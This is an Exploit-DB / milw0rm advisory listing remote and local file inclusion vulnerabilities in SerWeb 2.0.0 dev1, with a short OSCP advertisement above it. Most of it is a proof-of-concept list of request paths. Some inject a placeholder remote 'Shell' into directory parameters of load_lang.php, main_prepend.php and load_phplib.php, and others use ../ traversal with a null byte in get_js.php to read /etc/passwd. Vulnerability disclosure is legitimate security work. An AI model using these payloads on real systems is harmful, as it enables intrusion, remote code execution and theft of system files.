SerWeb 2.0.0 dev1 2007-02-20 - Multiple Local/Remote File Inclusion Vulnerabilities

EDB-ID:

4696


Author:

GoLd_M

Type:

webapps


Platform:

PHP

Date:

2007-12-06


Become a Certified Penetration Tester

Enroll in Penetration Testing with Kali Linux and pass the exam to become an Offensive Security Certified Professional (OSCP). All new content for 2020.

GET CERTIFIED

SerWeb <= 2.0.0 dev1 2007-02-20 Multiple RFI / LFI Vulnerabilities
D.Script : http://ftp.iptel.org/pub/serweb/daily-snapshots/serweb-2.0.0-dev1_2007-02-20.tar.gz
POC:
    /load_lang.php?_SERWEB[configdir]=Shell
    /main_prepend.php?_SERWEB[functionsdir]=Shell
    /load_phplib.php?_PHPLIB[libdir]=Shell
    /js/get_js.php?mod=../../../../../../../etc/passwd%00
    /js/get_js.php?js=../../../../../../../etc/passwd%00

# milw0rm.com [2007-12-06]